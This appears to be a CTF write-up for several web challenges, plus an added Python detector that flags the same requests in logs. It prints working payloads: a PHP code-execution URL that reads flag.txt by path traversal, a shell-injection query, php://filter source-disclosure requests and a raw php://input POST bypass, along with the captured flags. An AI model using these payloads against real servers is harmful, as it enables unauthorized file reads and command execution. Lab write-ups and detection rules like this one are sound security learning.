Web

qiandao

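For the sign-in challenge, the page source first reveals a PHP file, which in turn points to ./hint.php. Downloading that file gives a string of musical-note characters, which can be decoded directly: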

https://www.qqxiuzi.cn/bianma/wenbenjiami.php?s=yinyue

♭‖§∮♯♭‖§∮♬♭‖§§♫♭‖§∮§♭‖§♩§♭‖♯♬¶♭‖§§♫♭‖§§¶♭‖♯¶§♭‖♯¶♫♭‖§∮♭♭‖§§♫♭‖§§♬♭‖♯♬♪♭‖♯¶♪♭‖♯¶‖♭‖♯¶♯♭‖♯♬♬♭‖♯♬♪♭‖♯¶♯♭‖♯¶♯♭‖♯¶∮♭‖§∮♭♭‖♯♬♪♭‖§§♬♭‖♯¶§♭‖♯¶‖♭‖§§♬♭‖♯♬♪♭‖§§♫♭‖♯¶♪♭‖♯¶♫♭‖♯¶§♭‖§∮♭♭‖♯♬¶♭‖♯♬♬♭‖♯¶‖♭‖♯¶♫♭‖♯¶∮♭‖♯¶∮♭‖§§♫♭‖§♩♪‖‖‖♭§♪==

Decoding it yields a string of Braille:

⡖⡜⡑⡗⡋⠁⡑⡓⠅⠉⡕⡑⡒⠝⠇⠂⠄⠀⠝⠄⠄⠆⡕⠝⡒⠅⠂⡒⠝⡑⠇⠉⠅⡕⠁⠀⠂⠉⠆⠆⡑⡍=

https://www.qqxiuzi.cn/bianma/wenbenjiami.php?s=mangwen

Decoding the Braille then gives the flag:

flag{1ac59eab-7240-446e-b52b-a795e102966a}

code execution

The command can be executed directly. The payload is as follows:

http://183.129.189.60:10025/shell.php?php_cmd=var_dump(file_get_contents('../../../../../../../flag.txt'));

This returns the flag:

flag{8cc4060b-6adf-45f2-aa03-8194a7786031}

A command execution challenge (I don't remember the title)

?q=;ls>1.txt||

This writes the names of the files in that directory to 1.txt, and one of the file names is the flag. I really don't remember.

Where did the file go

This challenge tests arbitrary file read.

?file=php://filter/read=convert.base64-encode/resource=hint.php

The payload above reads hint.php, which contains a letter written in English:

<?php
<h2>Dear Professional ; Especially for you - this cutting-edge
intelligence ! If you no longer wish to receive our
publications simply reply with a Subject: of "REMOVE"
and you will immediately be removed from our club .
This mail is being sent in compliance with Senate bill
2216 ; Title 9 ; Section 303 ! This is not multi-level
marketing ! Why work for somebody else when you can
become rich inside 34 weeks ! Have you ever noticed
nearly every commercial on television has a .com on
in it & more people than ever are surfing the web !
Well, now is your chance to capitalize on this . We
will help you increase customer response by 140% &
turn your business into an E-BUSINESS . You are guaranteed
to succeed because we take all the risk ! But don't
believe us . Mr Anderson of Arkansas tried us and says
"I've been poor and I've been rich - rich is better"
. We are licensed to operate in all states . We beseech
you - act now ! Sign up a friend and you'll get a discount
of 10% . Thanks . Dear E-Commerce professional ; You
made the right decision when you signed up for our
club ! This is a one time mailing there is no need
to request removal if you won't want any more . This
mail is being sent in compliance with Senate bill 1618
, Title 9 ; Section 301 . This is not multi-level marketing
. Why work for somebody else when you can become rich
within 95 WEEKS . Have you ever noticed more people
than ever are surfing the web plus nobody is getting
any younger ! Well, now is your chance to capitalize
on this ! We will help you deliver goods right to the
customer's doorstep & deliver goods right to the customer's
doorstep ! You can begin at absolutely no cost to you
. But don't believe us . Prof Anderson of California
tried us and says "I was skeptical but it worked for
me" ! We are a BBB member in good standing ! Do not
go to sleep without ordering . Sign up a friend and
you'll get a discount of 50% . Thank-you for your serious
consideration of our offer ! Dear E-Commerce professional
, This letter was specially selected to be sent to
you . If you are not interested in our publications
and wish to be removed from our lists, simply do NOT
respond and ignore this mail ! This mail is being sent
in compliance with Senate bill 1625 ; Title 7 ; Section
304 ! This is different than anything else you've seen
. Why work for somebody else when you can become rich
in 10 weeks . Have you ever noticed society seems to
be moving faster and faster and people will do almost
anything to avoid mailing their bills . Well, now is
your chance to capitalize on this . We will help you
process your orders within seconds and increase customer
response by 130% . You can begin at absolutely no cost
to you . But don't believe us . Mr Simpson who resides
in Alaska tried us and says "I was skeptical but it
worked for me" . This offer is 100% legal ! Because
the Internet operates on "Internet time" you must act
now ! Sign up a friend and you get half off ! Best
regards . (我爱珊珊来迟,也爱spam,久等了)<h2>
?>

http://spammimic.com/decode.cgi

Decoding it directly gives the flag:

flag{c655f308-5254-4903-84b0-f86d4c85c7a6}

Fate

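Submitting admin / admin produced a PHP syntax error, and the error page contained admin123. Submitting admin / admin123 then produced another error page, and that page contained the flag. We got first blood on this challenge, and reported the issue to the organizers as soon as we found it.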

PHP, it's big and round

The payload is:

POST /?user=php://input&pass[]=1&file=php://filter/read=convert.base64-encode/resource=hint.php HTTP/1.1
Host: 183.129.189.60:10005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 9

admin

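Reading the source of hint.php gives the hint that the flag is in f19g.php (I forgot the file name). Use the same payload again to read f19g.php.

After Base64 decoding, it seems you get the following string, which contains the flag: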

<?php

error_reporting(E_ALL & ~E_NOTICE);

//flag{He6TuCTF@:F1a91stH1s}

?>
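
The requests used in the web challenges above all carry their payload in a query parameter, so they can be flagged in log review. The following is an added example, not part of the original writeup: the rule names and the `classify` function are this example's own, and the sample request targets are the payloads already shown on this page plus one constructed benign line.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Rule names are this example's own; patterns are keyed to the requests in this writeup.
RULES = {
    # php://filter and php://input passed where a file name or user value is expected
    "php_stream_wrapper": re.compile(r"(?i)\b(?:php|data|expect|phar|zip)://"),
    # repeated ../ climbing out of the web root
    "path_traversal": re.compile(r"(?:\.\.[/\\]){2,}"),
    # PHP function calls arriving as a parameter value
    "php_code_in_param": re.compile(
        r"(?i)\b(?:file_get_contents|var_dump|system|eval|passthru|shell_exec)\s*\("),
    # shell separators and output redirection
    "shell_metachar": re.compile(r"[;|`]|\$\(|>\s*\S"),
}

def classify(request_target):
    """Return a sorted list of (parameter, rule) hits for one request target."""
    hits = set()
    for pair in urlsplit(request_target).query.split("&"):
        name, _, raw = pair.partition("=")
        value = unquote_plus(unquote_plus(raw))  # second pass covers double encoding
        for rule, pattern in RULES.items():
            if pattern.search(value):
                hits.add((unquote_plus(name), rule))
    return sorted(hits)

# Request targets taken from the payloads on this page, plus one constructed benign line.
SAMPLES = [
    "/shell.php?php_cmd=var_dump(file_get_contents('../../../../../../../flag.txt'));",
    "/?q=;ls>1.txt||",
    "/?user=php://input&pass[]=1&file=php://filter/read=convert.base64-encode/resource=hint.php",
    "/index.php?file=about.php&page=2",
]

if __name__ == "__main__":
    for target in SAMPLES:
        print(target, "->", classify(target) or "clean")
```

The php://input body is not visible in the request line, so the `user` hit is the signal to go and inspect the POST body for that request.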

Pwn

wowotou

A relatively simple format string vulnerability, but it's the only kind I know how to do~~~

12-27 19:41